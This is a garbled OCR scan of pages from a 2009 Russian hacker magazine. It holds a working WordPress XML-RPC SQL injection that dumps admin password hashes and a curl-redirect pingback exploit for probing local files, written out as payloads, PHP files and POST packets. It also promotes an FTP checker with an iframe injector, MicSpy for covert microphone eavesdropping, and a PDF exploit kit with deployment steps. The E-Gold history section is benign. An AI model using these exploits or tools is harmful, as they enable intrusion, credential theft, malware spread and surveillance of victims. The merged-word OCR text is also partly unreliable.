Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

125_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

11.92 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

hang

NOW!

BUY

>>m

w Click

взлом

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

РЕЗУЛЬТАТВЫПОЛНЕНИЯSQL-ИНЪЕКЦИИВXMLRPC.PHP

ЗЛОПОЛУЧНЫЙCHANGESET ВSNOOPY

<param><value><string>1</string></

value></param> <param><value><string>[ИМЯ_АВТОРА]</string></value></param> <param><value><string>[ПАРОЛЬ_АВТОРА]</string></value></param> <param><struct>

</member>

<name>type</name> <value>gif',(select concat(user_ login,':',user_pass) from wp_users limit 1))/*</value>

</member>

<name>bits</name> <value>HELLO WORLD!</value> </member>

</struct>

</param>

<param><value><string>77</

string></value></param>

</params></methodCall>

Послеотправкипакетанаблогжертвыпоторописьпройтивадминку: Manage => Uploads. В поле«URL» вслучаеудачногосрабатывания эксплойтатыувидишьхешипарольадмина.

ФОКУСЫСКУРЛОМ

Представляютвоемувниманиюочередную уязвимостьWordPress (найденнуюнебез помощиЭлекта), котораязаключаетсяв

проверкесуществованиялюбогофайлана		true );
уязвимомблоге. Подверженывсеверсии
уязвимомблоге. Подверженывсеверсии
движка, начинаяс2.7. Дляначаланужно	Да-да! Тывидишьтотсамыйфлаг, отвечающий
сказать, чтоэтонесовсемуязвимостьворд-	заподдержкуредиректа!
пресса, а, скорее, фичаcurl, php-библиотеку	Дальшеопустимзаумныйкод, носкажулишь,
которогокакразиюзаетWordPress вместо	чтоподефолту(всеговозможнычетыре
ушедшеговнебытиеSnoopy. Итак, уязвимость	варианта) вкачестветранспортаhttp-данных
курлазаключаетсявтом, чтоонсрадостью	вордпрессвыбираеткурл:
можетпрочитатьдлятебянетолькоудален-
ныефайлыпоhttp, ноилокальныеспомощью		function wp_remote_get($url, $args
префикса«file://»! Но, какправило, префиксы		= array()) {
проверяютсяскриптамиещенавходеи, каза-		$objFetchSite =
лосьбы, «file://» заюзатьневозможно. Однако		_wp_http_get_object();
никтонеподумалотом, чтоcurl поддерживает		return $objFetchSite->get($url,
переадресациюспомощьюфлага«CURLOPT_		$args);
FOLLOWLOCATION». Тоесть, — подставив		}
курлувполнеобычныйhttp, навыходемы
курлувполнеобычныйhttp, навыходемы
можемполучитьчтениепроизвольного	2. Функция, приведеннаявыше, используетсяв
локальногофайла(подробноеadvisory отпер-	./wp-includes/functions.php:
вооткрывателяищивсносках)! Ввордпрессе
множествофайловюзаюткласс./wp-includes/		function wp_remote_fopen( $uri ) {
http.php, носейчасмырассмотримлишьодин		...
изнаиболеедоступныхpre-auth способов		$response = wp_remote_get( $uri,
эксплуатациибаги(найтидругиеспособыв		$options );
админке— твоедомашнеезадание:)).		...
Дляначаларассмотримнекоторыеособенно		}
важныедляэксплуатациибагакускикодав
важныедляэксплуатациибагакускикодав
последнейверсиивордпресса(2.7.1):	3.И, наконец, этажефункцияиспользуетсяв
1. ./wp-includes/http.php	ужеполюбившемсятебеинтерфейсеxmlrpc:

class WP_Http_Curl {		function pingback_ping($args) {
function request($url,		...
$args = array()) {
if ( !ini_get('safe_mode')		$pagelinkedfrom = $args[0];
&& !ini_get('open_basedir') )
curl_setopt( $handle,		$pagelinkedto = $args[1];
CURLOPT_FOLLOWLOCATION,		...

070	XÀÊÅÐ 05 /125/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ДОМАШНЯЯСТРАНИЦАВОРДПРЕССА

WP_OLD_SLUG, ЗАПИСАННЫЙВБАЗЕ

// Let's check the remote site $linea = wp_remote_fopen

($pagelinkedfrom);

...

Теперьунасестьвсенеобходимоедлянаписанияэксплойта, — кчемумысейчасиприступим.

АБЫЛЛИФАЙЛ?

Кактыужепонял, действоватьмыбудемчерез механизмпингбэков, прокоторыйяуженеоднократнорассказывалвпредыдущихномерах. Дляработынампонадобятсядвафайла, доступныхпоhttp. Например, такие: http://lamer. com/ping1/index.php иhttp://lamer.com/ping2/ index.php.

Предположив, чтоадреснашегоблога— lamer. com/blog ичтотестовымстендомявляетсяВинда, начнемработунаднеобходимымифайлами:

1. ./ping1/index.php

<?php

header("<title>Exploit</ title><a href="http://lamer.com/ ping2/?p=1#lamer.com/blog">Curl</ a>");

header("Location: file:///c:\boot.

ini", 302); ?>

2. ./ping2/index.php

Вэтомпримерепервыйфайлсможетпропинговатьвторой, благодаряещеоднойнедоработке вордпресса. Смотривмеханизмпинговxmlrpc. php:

// Check if the page linked to is in our site

$pos1 = strpos($pagelinkedto, str_replace(array('http:// www.','http://','https:// www.','https://'), '', get_ option('home')));

if( !$pos1 )

return new IXR_Error(0, __ ('Is there no link to us?'));

Вэтойпроверкевовсененужно, чтобывторой пингуемыйсайтобязательнобылтекущимблогом, таккакмыможемобойтипроверку, вставив адресэтогосамогоблога. Например, вконце URL послерешетки.

Всеготоводляпроверкиналичияфайлаc:\ boot.ini натестируемойсистеме.

Дляэксплуатацииуязвимоститебенеобходи- молишьпослатьследующийPOST-пакетдля сервераxmlrpc:

<methodName>pingback.ping</

methodName>

<param><value><string>http://

lamer.com/ping1/?p=2</string></

value></param>

<param><value><string>http:// lamer.com/ping2/?p=[ИД_СУЩЕСТВУЮЩЕГО_ПОСТА_НА_БЛОГЕ]#lamer.com/ blog</string></value></param> </params>

</methodCall>

Послеотсылкипакетатысможешьполучить дваответаотсервера:

1. Еслифайлc:\boot.ini существует, тоблог пришлеттакойответ—

Pingback from http://lamer.com/ ping1/?p=2 to http://lamer. com/ping2/?p=1#lamer.com/blog registered. Keep the web talking! :-)

2.Еслитакогофайланет, тождитакогоответа—

The source URL does not exist.

Кстати, этимспособомбылобывполневозможнопрочитатьсодержимоелюбогофайла системы, еслибыпингбэкнеурезалсядоочень

малогоколичествасимволов. Такчто, вком- ментарии-пингбэкетыувидишьлишьчто-то вроде:

[...] Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4 X-Powered-By: PHP/5.2.4 popa: 111 Location: file:///c:boot. ini Content-Length: 0 Connection: close Content-Type: text/html; [...]

Содержимоеc:\boot.ini остаетсягде-топод катом:). Описанный способ эксплуатации уязвимостинеявляетсяединственным.

В админке ты сможешь найти и другие вызовы функции wp_get_http(), которые позволят тебе читать файлы на системе. Найти их — уже твоя задача.

TO BE CONTINUED...

Нучто, тывсеещесчитаешьWordPress безопаснымдвижком?

Незабывай: злостныекодокопателиежедневновдольипоперекмучаютWordPress codebase. Какговорится, «Продолжение следует...» :)! z

XÀÊÅÐ 04 /124/ 09	071

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY				>>m
w Click				to	BUY					взлом
w Click				to						взлом
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ЛЕОНИД «R0ID» СТРОЙКОВ

/ R0ID@BK.RU /

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

>> взлом

Программы для хакеров


ПРОГРАММА:			FTP-TOOLZ	рами (PR/страна)
ОС:	*NIX/WIN			— Возможность сортировки акков по
АВТОР:		JEN		hostname

				Чекерподдерживаетстандартныйвидакка-
				Чекерподдерживаетстандартныйвидакка-
				унтов:

FTP-чекерновогопоколения:)

Потребностьвработоспособныхftp-чекерах естьвсегда. Именнопоэтомуяужепредставлял твоемувниманиюнесколькоинтересныхпродуктов. Асегодняхочупорадоватьещеодной достойнойтулзой— FTP-Toolz. Этомощный инструментдляработысфтп-акками, накоденныйнаPHP. Описыватьвсепреимущества чекера— делонеблагодарное, поэтомукоротко перечислюлишьосновныевозможности:

•Аплоад файлов через веб-интерфейс

•Чекер ftp-акков на валидность

•Встроенный ифраймер (добавление кода в начало/конец файла)

•Поиск и удаление чужих iframe-вставок

•run-time статистика

•Удобочитаемые логи

•Поддержка продолжения чека (то есть, если скрипт не закончил проверку, то при следующем запуске чекер начнет работать только с теми акками, которые не успел прочекать)

•Отчистка ftp-листа при импорте (удаление анонимных акааунтов)

•Встроенный парсер валидных/невалидных акков

•Наличие полноценной статистики за весь период работы скрипта

•Возможность остановки чекера и всех его запущенных копий, путем создания в папке с чекером файла «stop»

Крометого, всоставчекеравходитфункциональныйпарсер, спомощьюкотороготыбез трудасможешьотсортироватьфтп-аккипо заданнымпараметрам:

•Выборка акков по странам

•Выборка акков по Google PageRank (PR)

•Возможность проверки указанного числа аккаунтов с заданными парамет-

—ftp://login:pass@server

—login:pass@server

Сустановкойтулзыпроблемвозникнутьне должно. Тебепотребуетсязалитьсодержимое архиванасвой(илинесовсемсвой:)) сервер, установитьправаназаписьдлякаталога./ ftp_tools/upload, создатьновуюБДиотредак-

тироватьконфигmysql_config.php:

<?php

$db_host = "localhost";

# õîñò

$db_user = "root"; # þçåð ÁÄ $db_passwd = "root"; # пароль $db_name = "ftps"; # название БД ?>

Послеэтогоможешьсмелоприступатьк процессуинсталлаполинкуhttp://твой_хост/ ftp_tools/install.php.

Да, инезабудьдобавитьбазуGeoIP всоответс-

твующийкаталог./ftp_tools/seller_tool/GeoIP. dat. ДляработыутилыпотребуетсяPHP => 4.0.3 версиисотключеннымSafe_Mode, атакже MySQL любойверсии.

ПРОГРАММА:MICSPY

ОС:WINDOWS2000/XP АВТОР:SLESH

Утебяникогданевозникаложеланияподслушатьчужойразговор? Всесдетствазнают, что подслушиватьнехорошо, ноеслиоченьхочется

— выходесть! Нет, мынебудемваятьмодный жучокилиподключатьсяктелефоннойлинии. На этотразмыпростовоспользуемсямикрофоном, правда, чужим:). АпоможетвэтомутилаMicSpy отSLESH'а. Тулзапоканастадиитестированияи распространяетсявбета-версии, однакобольше всегонасинтересуетсамаидеяисорцы. Смысл работытулзызаключаетсявскрытойзаписи звукаприпомощисоответствующегодефолтовогоустройствавсистеме, коимможетявляться,

СорцыMicSpy by SLESH

например, внешнийиливстроенныймикрофон. Привключенномкомпежертвымыможем запростописатьвсеразговорыврадиуседосягаемости(зависит, впервуюочередь, откачества микрофона). Размерутилынемногимпревышает 7 Кб. Приэтомфункционалприятноудивляет:

•Данные записываются в аудио-файл формата .mp3, 24 КГц 32кбит/с, моно

•Для записи используется стандартный виндовый кодек MPEG LAYER-3

•Название каждого файла с записью указывается в виде: год_месяц_день_ час-минуты-секунды.mp3

•Наличие админки, которая по дефолту поднимается на порту 4545

Теперьнемногообадминке. Спомощьюпанели управлениятыможешь:

•Начинать/останавливать запись

•Просматривать листинг записанных файлов, получать размер каждого и т.п.

•Удалять записанные файлы

•Скачивать записанные файлы

P.S. В архиве с утилой лежат и сорцы: MicSpy.dpr — основная часть тулзы, включая реализацию админки

API.pas — константы, типы и функции MicRec.pas — функции записи

Cловом, приналичиипрямыхрукоткрывается широкийпростордляфантазии. Использовать подобнуюидеюможновразныхнаправлениях (обязательноблагих:)). Такчто— дружноговорим«спасибо» SLESH'уиидемвникатьвсорцы.

072	XÀÊÅÐ 05 /125/ 09

hang

NOW!

BUY

>> взломw Click

BUY

w Click

-xcha

-x cha

// таблица с логированием атак

ПРОГРАММА:WEBSECURITYSYSTEM

$TableCache

= "cache";

ОС:*NIX/WIN

// таблица с информацией об

АВТОР: AVADANEIANDREI

атакующих

Впоследнеевремяширокоераспространение						?>
получилиразнообразныедетекторыатак, ло-
гирующиевседействиязлоумышленника. Яже	КонфигурируемсистемубезопасностиWSS					Смелозаливайсофтинунасвойсерверипри-
хочуобратитьтвоевниманиенанесколькоиной						ступайкконфигурации. Ипомни, безопасности
продукт— Web Security System — предназначен-	ssage]) — отправка сообщения атакую-					многонебывает.
ныйдлязащитыотXSS, SQL-injection, RFI-атак.	щему при обнаружении атаки
Поверь, этонепустыеслова! Системареально	• SetPatchVars([$value]) — определе-					ПРОГРАММА:UNIQUEPACKV.1.1
работает(разумеется, приграмотнойнастройке	ние действий в случае атаки					ОС:*NIX/WIN
:)). Изпреимуществпродуктастоитотметить:
	• private $ProtectionLevel				= 7;
• Быстрая работа с PHP-файлами	// Protection level
• Быстрое обнаружение уязвимостей и	• private $WarningLevel				= 3;
их устранение	// Warning level
• Логирование всех атак в БД	• private $MysqlID			= -1;
	// Mysql Connection ID
Админкасистемыпозволяет:	• private $ShowMessage			= TRUE;
	// If we detect something we show an					КонфигUnique Pack
• Просматривать IP-адреса атакующих	message
• Получать информацию о типах атак	• private $EventMessage				= "Acces	Кактыужезнаешь,найтихорошуюсвязкувпабли-
• Просматривать все логи по конкрет-	Violation!";		// Message show			ке—задачанепростая.Ярешилподелитьсяодной
ному IP-адресу атакующего	in case of attack detection					изприватныхверсийсвязкиUniquePackv.1.1.Она
	• private $PatchVars			=		ужевовсюгуляетпополуприватуивнедалекомбу-
Крометого, всофтинереализованапроверка	TRUE;		// Patch value			дущемокажетсявпаблике,такчтосчитайподарок
глобальныхпеременных:	from detected problems					неболеечемтестовымпродуктомпередпокупкой
	• private $FollowAttacker				= TRUE;	лицензионнойверсии.Чтоизменилосьврелизе:
• $_GET	// Store all information about
• $_POST	attacker from now on					• Изменена выдача PDF-файла (кроме
• $_SERVER	• private $ExistThreads				= FALSE;	самого сплойта, генерируется PDF-
• $_SESSION	// Security Threads					файл с рандомными значениями)
• $_COOKIE	• private $SecurityThreads				=	• Обновлен PDF-сплойт (теперь ис-
	array(array(array()));				// Store	пользуется Double PDF новой и старой
Вкачествепеременныхдля$_SERVER исполь-	threads if exists					версии совместно)
зуются:	• private $SystemVersion				= "1.4";	• Изменен метод шифрования сплойтов
	// System Version
"HTTP_ACCEPT", "HTTP_ACCEPT_	• private $SystemUpdateLink = "";					Установитьсвязкунесложно:
CHARSET", "HTTP_ACCEPT_ENCODING",	// Hold update link
"HTTP_ACCEPT_LANGUAGE", "HTTP_	• private $SystemUpdateVers = "";					• Заливаем файлы на абузный сервер
CONNECTION", "HTTP_HOST", "HTTP_	// Hold update version					• Заливаем свой exe'шник в папку со
REFERER", ”HTTP_USER_AGENT",	• private $ExceptionVars				=	связкой с названием 1.exe
"SERVER_ADMIN", "SERVER_PORT",	array();		// Hold			• Создаем базу данных
"SERVER_SIGNATURE", "PHP_AUTH_	special checks vars					• Открываем файл config.php и вписы-
DIGEST", "PHP_AUTH_USER", "PHP_						ваем данные базы, полный линк до pdf.
AUTH_PW", "AUTH_TYPE".	Нуасамконфигconfig.php выглядитдостаточно					php и полный линк до load.php, а также
	просто:					логин/пароль на доступ к статистике
Помимоконфига, которыйрасполагаетсяв						• Вбиваем в браузере адрес http://
файлеconfig.php, настоятельнорекомендую	<?php					наш_сайт/spl/_install.php и запус-
изучитьсодержимоескриптаprt_system.php,	$user = "Andrei"; //логин админа					каем инсталл
ибовнемсосредоточеныосновныенастройки	$pass = "wss"; //пасс админа					• После надписи "Installation
ифункциисистемы:	// данные для подключения к СУБД					finished Please delete install.php"
	$connection = array("server" =>					удаляем _install.php
• RunPSystem() — основные функции	"localhost",
для запуска сканирования системы	"user"	=> "root",				Испокойнонаблюдаемстатупозагрузкам:
• SetScanZone($which,$value) — èñ-	"pass"	=> "",
пользуется при сканировании глобаль-	"database" => "wss");					http://íàø_ñàéò/spl/admcp.php
ных переменных	//WARNING !! if you edit settings
• SetNoneProtection() — определяет	bellow you must edit settings from					Атрафикнаправляемвотнаэтотлинк:
уровень защиты (1 — минимальный)	the prt_system.php file..
• SetAllProtection() — устанавливает	$TablePrefix		= "prt_sys_";			http://íàø_ñàéò/spl/index.php
высший уровень защиты — 7	// префикс таблиц
• SetWarningLevel([$level]) — îïðå-	$TableMain		= "main";			P.S.Поверь, лицензионнаяверсиясвязкистоит
деляет уровень предупреждений	// основная таблицы					своихденег, аналичиеподдержкииапдейтов
• SetMessageToAttacker([$show],[$me	$TableAttackers		= "attackers";			окупитприобретениевсамыекороткиесроки. z
XÀÊÅÐ 05 /125/ 09						073

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
w Click					BUY				>>m
w Click				to					>>m


w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

сцена

	Gold
-
E

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

E-Gold

МАРИЯ «MIFRILL» НЕФЕДОВА

/ MIFRILL@RIDDICK.RU /

ОСТАТКИ БЫЛОЙРОСКОШИ

МедленнаясмертьсистемыE-Gold

WebMoney, PayPal, Яндекс.Деньги, Moneybookers… итакдалее, далее, далее. Платежныхсистемвинтернете насчитываетсявеликоемножество. ОднипопулярнынаЗападе, другиенаВостоке, третьипытаютсяусидетьнадвух стульяхсразу. Ещесравнительнонедавнониодинсписокэлектронныхплатежныхсервисовнеобошелсябыбез имениE-Gold. Носегодняэтоназваниесталочутьлинесинонимомслова«кидалово». Хочешьзнать, почемупопулярнейшаясистемапришлавстольплачевноесостояние, аееруководствоедванеугодилозарешетку?

ЭКСКУРС В ИСТОРИЮ Предмет	Казалосьбы, преуспевающийврач, нистого	ужев1996-мгоду, впочтисвободнойтогда
нашегосегодняшнегоинтереса— E-Gold —	ниссегоударившийсявэлектроннуюком-	нишерынка. Результатнезаставилсебя
можетпоправугордитьсянетолькобылым	мерцию, окоторойтогданиктоещетолкомне	ждать. Джексондействительнонеошибся—
статусомоднойизкрупнейшихинаиболее	помышлял— этовесьмастранно. Ножизнь	ужев1998-монбылвынужденотказатьсяот
популярныхплатежныхсистем, ноипочет-	полнасюрпризов. Деловтом, чтоДжексон	продолжениямедицинскойдеятельностив
нымзваниемоднойизстарейшихизних.	всегдабылнеравнодушенкфинансам, а,	пользустремительнонабирающейобороты
Придумали«электронноезолото» насамой	занявшисьсобственнымбизнесом, ушелв	компанииGold & Silver Reserve (G&SR) Inc.
зареинтернета— в1996 году, исделалиэто	нихсголовой. Онпредпочиталзнать, счем	ДугласпередалсвоюдолювFlorida Oncology
двавесьмадалекихотвсякой«компьютер-	имеетделои«какэтоработает». Ив1995-м	партнерамиполностьюсосредоточилсяна
щины» человека— ДугласДжексон(Douglas	унегородиласьидеяосозданииудаленной	новойработе.
Jackson) иБарриДауни(Barry K. Downey).	платежнойсистемы, которойнетребовался	СоучредителемG&SR ипартнеромДжексона
«Папа» E-Gold (ДугласДжексон) поспеци-	быпромежуточныйфинансовыйинститут.	сталБарриДауни— юристпообразованию,
альности— врач-онколог, притомнекогда	КтакимразмышлениямдоктораДжексона	тожевполнеуспешныйвсвоемделе. Специ-
весьмауспешный. Всвоевремяоннетолько	подтолкнулочастноеисследованиеоденеж-	алиствобластиправа, успевшийпобывать
получилвысшеемедицинскоеобразованиеи	номвлияниинакредитныйипромышленный	членомамериканскогоВерховногосуда, а
успелпослужитьсвоейстраневрядахармии	цикл.	такжеавторисоавторрядаюридическихтру-
США, нопослеслужбыпродолжилкарьеру,	Поняв, чтонарукахунего— готовая, ра-	дов, сготовностьюприсоединилсякмедику,
возглавивотделениерадиационнойонко-	ботающаясхемаинежелаяоткладывать	взваливнасебядолжностисекретаря, вице-
логииврегиональноммедицинскомцентре	реализациюпридуманногонаабстрактное	президентаидиректоракомпании.
Мельбурна(штатФлорида). Анемногимпоз-	«потом», Джексондовольнобыстросумел
жеивовсеоткрылчастнуюклиникуFlorida	найтисредстваивозможностидлявопло-	ЗОЛОТОЙ ФОНД Поравкратцерас-
Oncology.	щениясвоейидеивжизнь. E-Gold заработал	сказатьопринципахработыE-Gold. Вполне

074	XÀÊÅÐ 05 /125/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
сценаw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ТАБЛИЦАТЕКУЩЕЙСТОИМОСТИ«ЭЛЕКТРОННЫХМЕТАЛЛОВ»

вероятно, чтоонитебенезнакомы— компа-	черезобменныйпунктэлектронныхвалют. С	вые, деньги в ней не циркулировали. Во
ниярастеряласвоюпопулярностьиначала	выводомденегвсетожевыгляделопри-	всяком случае, именно так звучала позиция
«тонуть» ещевсамомначалеXXI столетия.	вычно: егоможнобылоосуществитьчерез	доктора Джексона.
Многиепопростуеенезастали.	любойэлектронныйобменник, банковский	Все это, разумеется, привело к повышен-
В отличие от привычных для нас сегодня	чекилиперевод, атакже, теоретически, даже	ному вниманию со стороны правительства,
электронных платежных систем, E-Gold не	получитьнарукисвойслитокдрагоценного	но ситуация вокруг E-Gold развивалась
использует денежных единиц. Вместо них	металла.	весьма неспешно, вплоть до 9 сентяб-
все строится на самых настоящих драгме-	Сложнонеоценитькрасотуиизяществоза-	ря 2001 года. А вот после падения ба-
таллах — то есть, золоте, серебре, платине	думкиДжексона, однакоихоказалосьнедо-	шен-близнецов в Штатах было принято
и палладии. Физические запасы компании	статочно. Хотьиговорят, что«всегениальное	множество мер, направленных на борьбу с
— ее Золотой фонд — хранятся в слитках	— просто», простотаигениальностьсыграли	терроризмом, в том числе, широко извест-
(почти 2.5 тонны одного только золота!),	скорее«против», чем«за» E-Gold.	ные «Акт о национальной безопасности»
в надежных банковских хранилищах,		и «Патриотический акт». По сути, немало
подальше от физических, политических и	ВХОЖДЕНИЕ В ШТОПОР Успехи	законов в то время попросту протолкнули
других рисков. Так что, при расчетах через	платежной системы и ее стремитель-	«под шумок», так что узаконенная про-
E-Gold счет идет не на условные единицы,	ный рост не остались незамеченными. С	слушка телефонных разговоров и прочие,
а на тройские унции (XAU) и граммы (AUG).	увеличением числа зарегистрированных	не слишком приятные, вещи стали реаль-
Это позволяет забыть о колебаниях курсов	пользователей (к началу 2003 года их был	ностью. Само собой, и для платежной сис-
валют — стоимость ценных металлов на	уже миллион), у компании появлялись	темы, которая, по мнению правительства и
мировых рынках вещь гораздо более пос-	конкуренты, завистники и люди, недоволь-	недоброжелателей, имевших большой вес
тоянная.	ные ее деятельностью. Основная проблема	в политических и финансовых структурах,
Сюридическойточкизренияполучалось, что	заключалась в том, что E-Gold фактически	«крышевала» мошенников и порнографов,
людиобмениваютсяраспискамиоразмеще-	не требовал для регистрации никаких	пришло время или менять свою политику,
нииопределенногоколичествадрагметалла	удостоверений личности. Данные, введен-	или же отправляться под суд.
нахранениевкомпанииE-Gold Ltd. (почти	ные пользователем, никак не проверялись,	Какнистранно, E-Gold негорелжеланием
всеполномочияпоуправлениюсистемой	не существовало и лимита на количество	меняться. Неизвестно, насколькоправди-
электронныхплатежейбылипереданы	аккаунтов, открытых на одного человека.	выслухиотом, чторуководствокомпании
компанииE-Gold Ltd., зарегистрированнойв	Единственным «строгим требованием» был	прекраснозналоопроходящихчерезих
Вест-Индии).	адрес электронной почты. Получалось, что	системупотоках«грязныхденег» иимелос
Системаспециальностроиласьтаким	сервис легкодоступен, прост (все операции	нихнемалуюприбыль— нотогдаговорили
образом, чтобынезависетьотфинансовых	совершались прямо в браузере) и практи-	иписалиобэтоммного. Хотясудутакине
рынков, самакомпаниянеобладаланикакой	чески анонимен. К тому же, отменить тран-	удалосьдоказатьвинувладельцевсистемы,
национальнойвалютойинеимеласчетовв	закцию в E-Gold было делом проблемным,	однозначносказать«было» или«небыло» —
банках. Плюсковсему, средстваклиентов	если не сказать, малореальным. Все это,	невозможно.
являлисьактивами, находящимисянахра-	само собой, привлекло внимание не только	Однакомызабегаемвперед, атогда, вначале
нении, а, значит, немоглибытьпредметом	простых пользователей, но и аферистов	2000-х, разрешитьвопросмиромневышло.
судебныхпритязаний.	всех мастей — от банальных кидал до	Компаниянехотела, немоглаилинесчитала
Спомощью«электронногозолота» можно	кардеров и, предположительно, торговцев	нужнымвводитьболеесерьезныеспособы
былоделатьпереводыдругимпользова-	детским порно. Вдобавок, у E-Gold на руках	идентификациипользователейисбольшей
телям, приниматьплатежинасвойсчет,	не было необходимых по закону лицензий	ответственностьюподходитькконтролюнад
расплачиватьсявинтернет-магазинахит.д.	для осуществления денежных переводов.	транзакциями. Последующиегодыпреврати-
Вводденегвсистемуосуществлялсяобыч-	А лицензии отсутствовали в виду того, что	лисьдляE-Gold вчередусудебныхразбира-
нымиметодами— банковскимплатежом,	расписки, имеющие хождение в системе,	тельств. Изаэтовремяпрессауспела«похо-
переводомотдругогопользователяилиже	оставались лишь расписками, и, как тако-	ронить» компаниюнеменьшедесяткараз.

XÀÊÅÐ 05 /125/ 09

075

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
w Click					BUY				>>m
w Click				to					>>m


w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

сцена

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

СОЗДАТЕЛЬE-GOLD, ДОКТОР ДУГЛАСДЖЕКСОН

Непосредственныедействия«поборьбес E-Gold» былиразвернутытольков2004-2005 годах. Готовилиськнимосновательноидавно, такчтообвинили«электронноезолото» практическивовсехсмертныхгрехахсразу. Еслиточнее, вмениливвину, что, являясь юридическимлицом, компаниязанимается денежнымитранзакциямибезсоответствующейнатолицензии; фактически способствуетразвитиюпротивозаконнойдеятельностифинансовыхпирамид, киберпреступниковиижесними, оказывая имбанковскиеуслуги; атакжеотмывает деньгипорнографов(втомчисле, детских). Расчехливлюбимыепугала— терроризми детскоепорно, к2005-мугодуправительст- воокончательновышлона«тропувойны».

ОфисыкомпанииGold&Silver Reserve, Inc. подверглисьобыску, абанковские счетабылизаморожены. Властивпервые попыталисьдоказатьвсуде, чтовсистеме

циркулируютворованныеденьги. Впрочем, изэтогоничегоневышло. В2006-мсудвы- несоправдательныйприговор, попричине отсутствиядоказательстввиныE-Gold.

Тогдакомпания, посути, отделаласьлегким испугом, имногиерассчитывали, чтопосле этого«инцидента» руководствоE-Gold образумитсяиначнетприниматьмерыи затягиватьгайки. НоДжексон, Даунииих коллегирешилииначе— переменвсистеме непоследовало.

Параллельноссудебнымпроцессом, репута- циюE-Gold портилапресса. Товодном, тов другомавторитетномIT-изданиивсплывала информацияонезаконныхоперациях, прово- дящихсячерезE-Gold.

Например, BusinessWeek сообщал, что крупная международная команда кардеров ShadowCrew активно использует «электронное золото», перекачивая через него от $40.000 до $100.000 в неделю. Интересно, что в это же самое время официальная статистика компании утверждала, что по данным на апрель 2006-го, только у двадцати четырех клиентов на счету было свыше

ИНТЕРЕСНАЯСТАТИСТИКАПОМЕТАЛЛАМИАККАУНТАМ

Основнаяпроблемазаключаласьвтом, чтоE-Gold фактическинетребовалдля регистрацииникакихудостоверений личности.

10 килограммов золота (что примерно равно $200.000). О том, что один человек может иметь и 5, и 15 депозитов статистика тактично умалчивала.

Вответ на эти, в общем-то, логичные, выпады Джексон публично заявлял, что все операции в его системе легальны, а нажитые незаконным путем средства — проблема никак не компании E-Gold, а людей, которые эти деньги крадут. Он говорил, что другие платежные системы не менее виновны «в отмывании денег» и советовал властям обратить внимание на тот же PayPal.

Атакже Дуглас не уставал напоминать прессе и сильным мира сего о том, что E-Gold всегда охотно сотрудничает с правоохранительными органами, помогая в расследованиях ФБР, федеральной торговой комиссии, внутренней налоговой службе, управлению по борьбе с наркотиками и так далее.

Всамом деле, в E-Gold даже начали уст-

раивать демонстрационно-показательные облавы, в ходе которых аккаунты блокировались тысячами, а сам основатель компании помогал властям в обучении борцов с кибер-преступностью. Но и этого оказалось недостаточно.

ЕщеодинтяжелыйударсистеменанесаукционeBay, в2006 годуполностьюперешедший наPayPal иотказавшийсяотуслугдругих сервисовэлектронныхплатежей. Ипускай E-Gold быладалеконеединственной«оставленнойзабортом» системой, наeBay «электронноезолото» былоупомянутоотдельной строкой. Правилааукционаподчеркивали, чтоиспользованиеE-Gold караетсянемедленнымзакрытиемаккаунтапродавца(добавим, чтоаналогичнуюмеруможносхлопотать отнюдьнетолькозаиспользованиеE-Gold).

ЗАБВЕНИЕНесмотрянато, чтонапро- тяжениивсейстатьиречьоE-Gold идетв прошедшемвремени, сегоднякомпанияи

076	XÀÊÅÐ 05 /125/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
w Click					BUY				>>m
w Click				to					>>m


w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

сцена

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

СОЗДАТЕЛЬE-GOLD, ДОКТОР ДУГЛАСДЖЕКСОН

ИНТЕРЕСНАЯСТАТИСТИКАПОМЕТАЛЛАМИАККАУНТАМ

